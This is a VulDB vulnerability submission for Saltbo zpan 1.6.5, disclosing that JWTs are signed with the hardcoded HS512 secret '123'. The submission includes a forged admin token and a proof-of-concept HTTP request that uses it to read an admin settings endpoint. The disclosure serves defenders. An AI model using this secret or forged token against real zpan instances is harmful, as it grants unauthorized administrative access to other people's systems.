Invia #608447: Saltbo zpan 1.6.5 Hard-coded Credentialsinformazioni

TitoloSaltbo zpan 1.6.5 Hard-coded Credentials
Descrizione# Summary A critical security vulnerability has been identified in Saltbo/zpan v1.6.5, where the system uses a hardcoded JWT (JSON Web Token) secret key "123" for token signing. This implementation flaw allows attackers to forge valid authentication tokens, bypassing security controls and gaining unauthorized access to any zpan instance running this version. # Details The vulnerability stems from the use of a static HMAC-SHA512 (HS512) secret key ("123") for JWT signing in the z-token authentication mechanism. **Algorithm:** HS512 (HMAC-SHA512) **Hardcoded Secret Key:** 123 **Sample Admin JWT Token:** eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMTkxLCJpYXQiOjE3NTE1MzUzOTEsImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1MzkxLCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.lhYjZpv4PAZSeq2zaLJDSgXvV5Lef2sArafHA2PQnTCeeUDT0yvPkG3qv5axKLBj-AeeAjWz3Y57_rrTavP4g # POC ``` GET /api/system/options/core.email HTTP/1.1 Host: target-ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: application/json, text/plain, */* Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: z-token=eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJ6cGxhdFVzZXJzIiwiZXhwIjoxNzUyMTQwMDg5LCJpYXQiOjE3NTE1MzUyODksImlzcyI6InpwbGF0IiwibmJmIjoxNzUxNTM1Mjg5LCJzdWIiOiIxIiwicm9sZXMiOlsiYWRtaW4iXX0.a_B2Kzq9ZIi3-kqz0VcIsqX39Abn_Je2TUl_gt67ZkpbKt31hwa-vvrS9H2LIw2n7TmJwtk59tmsVkk9wQiZxQ; Connection: keep-alive ```
Fonte⚠️ https://github.com/saltbo/zpan/issues/219
Utente
 jiashenghe (UID 39445)
Sottomissione03/07/2025 12:07 (12 mesi fa)
Moderazione11/07/2025 10:50 (8 days later)
StatoAccettato
Voce VulDB316097 [saltbo zpan fino a 1.6.5/1.7.0-beta2 JSON Web Token token.go NewToken autenticazione debole]
Punti20

PrecedenteVisione D'ensembleIl prossimo

Want to know what is going to be exploited?

We predict KEV entries!